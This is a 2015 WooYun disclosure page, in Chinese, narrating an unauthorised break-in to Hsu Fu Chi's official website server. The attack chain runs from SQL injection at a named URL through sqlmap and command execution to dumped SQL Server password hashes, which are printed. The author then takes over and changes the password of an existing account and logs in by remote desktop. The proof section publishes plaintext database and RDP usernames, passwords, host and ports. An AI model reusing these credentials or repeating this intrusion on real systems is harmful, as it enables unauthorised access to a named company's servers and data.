当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101192

漏洞标题:徐福记官网一个注入引发的血案

相关厂商:徐福记

漏洞作者: LinE

提交时间:2015-03-16 14:44

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

因为主站的一个注入导致...........
GetShell可能都是小问题了····

详细说明:

某日闲着没事,对徐福记官网进行了一个检测,结果发现一处注入
http://www.hsufuchifoods.com/Contact.aspx?MenuID=001008001
然后丢到sqlmap直接跑去了,果然可以跑出来信息

1.png


看一下库的信息

2.png


SQL Server的用户信息

3.png


当时想着既然是SQL Server,那有可能有命令执行,结果试了一下果然有

4.png


不光有,权限还是蛮大的- -!
然后想着,既然有命令执行,在sqlmap里毕竟不好搞,想换到1433下,于是查了一下IP,是外网的独立IP,扫了一下端口

5.png


1433开放,然后就打算破SQL Server的密码

QQ截图20150313173049.png


搞到密码hash之后扔到cmd5查了一下, 出来了两个

[*] bear [1]:
password hash: 0x010063497720145122ec5bd6c2b5384be74c78046df8f76ceb3e
header: 0x0100
salt: 63497720
mixedcase: 145122ec5bd6c2b5384be74c78046df8f76ceb3e
[*] btopsxufuji [1]:密码为xufuji123
password hash: 0x010018dbe795bbf3a8f3d7e7e7935c951ccb1175807dff3bae9b
header: 0x0100
salt: 18dbe795
mixedcase: bbf3a8f3d7e7e7935c951ccb1175807dff3bae9b
[*] sa [1]:
password hash: 0x01006d12341a3b0450efa7a3af5f9d4f92b5ebb95701cf767a97
header: 0x0100
salt: 6d12341a
mixedcase: 3b0450efa7a3af5f9d4f92b5ebb95701cf767a97
[*] wsb147 [1]: 密码为151844
password hash: 0x010048da0d499644113ea6701934e11614306929d242bd278154
header: 0x0100
salt: 48da0d49
mixedcase: 9644113ea6701934e11614306929d242bd278154
[*] xufuji [1]:
password hash: 0x01006eb32ab4eb3f3778e6f60a07c20f09bf8cacbcd2e1feb1a0
header: 0x0100
salt: 6eb32ab4
mixedcase: eb3f3778e6f60a07c20f09bf8cacbcd2e1feb1a0


然后随便找了一个登陆上去,再次命令执行,果然不出我所料,也是system

6.png


然后查了一下账户,看样子徐福记官方已经被拿过了

7.png


然后既然被拿过了,我就毫不客气的吧$darkmoon的密码改了,顺便查了一下终端的端口号

8.png


然后我就登陆上去了...
登上去了...
上去了...
去了...
了...
...

9.png


看了一下IIS配置,徐福记主站果然在上面,尝试在网站的根下加了一个txt,果然访问到了

10.png


到了这一步已经个人觉得没啥能继续深入的余地了,也就没有再继续深入下去
所有创建的文件均已删除,截图仅作证明,就酱紫了

漏洞证明:

2.png


4.png


SQL Server信息:
www.hsufuchifoods.com:1433
btopsxufuji xufuji123
wsb147 151844
远程桌面信息:
www.hsufuchifoods.com:9168
$darkmoon line

修复方案:

弱弱的问一句,有糖吃么
◕ ̯͡◕

版权声明:转载请注明来源 LinE@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论